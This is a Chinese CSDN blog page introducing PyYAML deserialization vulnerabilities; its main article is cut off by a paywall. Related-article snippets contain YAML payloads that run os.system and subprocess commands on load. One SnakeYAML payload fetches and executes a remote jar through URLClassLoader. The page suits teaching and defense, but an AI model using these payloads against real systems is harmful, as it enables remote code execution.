(Python)PyYAML反序列化漏洞

最新推荐文章于 2024-06-06 15:21:08 发布
最新推荐文章于 2024-06-06 15:21:08 发布
阅读量3.4k 收藏 4
点赞数 1
分类专栏: Web安全 漏洞 文章标签: PyYAML反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/85013724
版权

基本概念

(引用百度)YAML是“YAML不是一种标记语言”的外语缩写;但为了强调这种语言以数据做为中心,而不是以置标语言为重点,而用返璞词重新命名。它是一种直观的能够被电脑识别的数据序列化格式,是一个可读性高并且容易被人类阅读,容易和脚本语言交互,用来表达资料序列的编程语言。

PyYAML是Python中YAML语言的编辑器和解释器。

安装:pip install PyYAML

两个函数:

yaml.dump():将一个Python对象序列化生成为yaml文档。

yaml.load():将一个yaml文档反序列化为一个Python对象。

简单的用例:

可以看到,User对象经过yaml序列化之后内容为一行字符串,简单解释一下:“!!pythonobject”为yaml标签,yaml.load()会识别该标签并调用相应的方法执行反序列化操作;冒号后面的“__main__”为py文件名,这里为本文件的意

最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全】Nacos Client Yaml反序列化漏洞分析
HBohan的博客
10-15 5512
背景 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 Nacos是阿里巴巴于2018年开源的项目,目前在Github中已获得 19.8kSt,由此可见其的使用广泛程度。 未授权访问漏洞 threedr3am师傅在去年十二月份的时候在Github上.
PyYaml反序列化漏洞详解
2302_76827504的博客
04-27 581
果listitems不为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
PyYaml反序列化漏洞
snowlyzz的博客
05-08 1036
pyyaml 反序列化 简洁总结
linux 如何解压 zip
最新发布
计算机辅助工程
06-06 361
这段Java代码将会将file.zip文件解压到当前目录。这将会将file.zip文件解压到当前目录。这将会将file.zip文件解压到当前目录。这将会将file.zip文件解压到当前目录。这将会将file.zip文件解压到当前目录。
Pyyaml-yaml.load反序列化漏洞
huichen1233的博客
08-30 2922
YAML 是 “YAML Ain’t a Markup Language”(YAML 不是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。它使用空白符号缩进和大量依赖外观的特色,特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如:许多电子邮件标题格式和YAML非常接近)。blog.yml。...
YAML出现严重的反序列化漏洞,谷歌TensorFlow将采用 JSON
smellycat000的专栏
09-06 1195
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士由谷歌开发的基于 Python 的开源机器学习和人工智能项目 TensorFlow 放弃对 YAML 的支持,以修复严重的代码执行漏洞。...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
yaml反序列化
u013224189的专栏
11-23 2175
Yaml反序列化 payloads1: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]] ] payloads2: ​ 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。 !<tag:yaml.org,2002:javax.script.Scri
Python PyYAML反序列化漏洞实验和Payload构造
3569
04-24 3415
0x01 概述什么程序存在漏洞:使用了PyYAML这个库并且使用了yaml.load而不是yaml.safe_load函数来解析yaml文件的程序代码审计关键词:import yamlyaml.load(已知相关漏洞:Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)https://pypi.p...
【春秋云境】CVE-2020-14343 PyYAML中存在不安全的反序列化漏洞
HMX404的博客
03-26 446
PyYAML中存在不安全的反序列化漏洞。攻击者可利用该漏洞执行任意代码。
pyyaml反序列化漏洞
黑面狐
02-14 855
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。 测试 import yaml yaml.load('!!python/object/apply:os.system ["date"]')   结果 poc还可以 !!python/object/apply:subprocess.check_output [[calc.exe]] !!python/object...
Python反序列化
hackzkaq的博客
06-01 1825
更多渗透技能 欢迎搜索公众号:白帽子左一 一、Python反序列化 与PHP存在反序列化一样 Python也存在反序列化漏洞、并且Python反序列化更加强大 除了能反序列化当前代码中出现的类(包括import引入的模块中的类) 还能反序列化types创建的匿名对象! 二、Python反序列化高危模块 marshal PyYAML pickle和cpickle shelve unzip 对高危模块的分析 1.marshal 特点 1.不是一个通用的“持久性”模块; 2.主要用于读取和编写.pyc文
python3 subprocess.check_output 执行shell命令 返回结果
热门推荐
whatday的专栏
07-28 3万+
Python3中的subprocess.check_output函数可以执行一条sh命令,并返回命令的输出内容,用法如下: output = subprocess.check_output(["python3", "xx.py"], shell = False) 该函数两个参数第一个表示命令内容,因为中间有空格所以用中括号这种形式,同时制定shell=False表示命令分开写了。而该命令执行后的输出内容会返回给output变量。 需要注意的是这个output变量并不是一个string,也就是说不能
python反序列化漏洞防御
09-13
要防止Python反序列化漏洞,您可以采取以下几种措施: 1. 验证和过滤输入:在反序列化之前,验证和过滤所有传入的数据。确保只接受可信任和预期的数据,并拒绝任何可能包含恶意代码的输入。 2. 使用安全的反序列化库:选择使用具有安全特性的反序列化库,如JSON或MessagePack。这些库实现了一些安全措施来防止常见的反序列化漏洞。 3. 限制反序列化的可用类:在反序列化之前,限制可以被反序列化的类的范围。可以通过白名单机制,只允许反序列化特定的类,并拒绝其他类的反序列化操作。 4. 更新Python版本:保持您的Python环境更新到最新版本,并及时应用安全补丁。新版本通常会修复已知的安全漏洞,并提供更强大的安全特性。 5. 沙箱环境:在处理不可信任的反序列化数据时,可以考虑在受控的沙箱环境中执行反序列化操作。这样即使存在漏洞,也可以限制对系统的潜在危害。 6. 安全审查:定期进行代码审查和安全审计,以识别和修复潜在的反序列化漏洞。这可以帮助您发现并纠正代码中的安全问题。 请注意,这些措施并不能保证完全防止所有类型的反序列化漏洞,因此在编写和使用具有反序列化功能的代码时,始终要保持警惕并遵循最佳安全实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值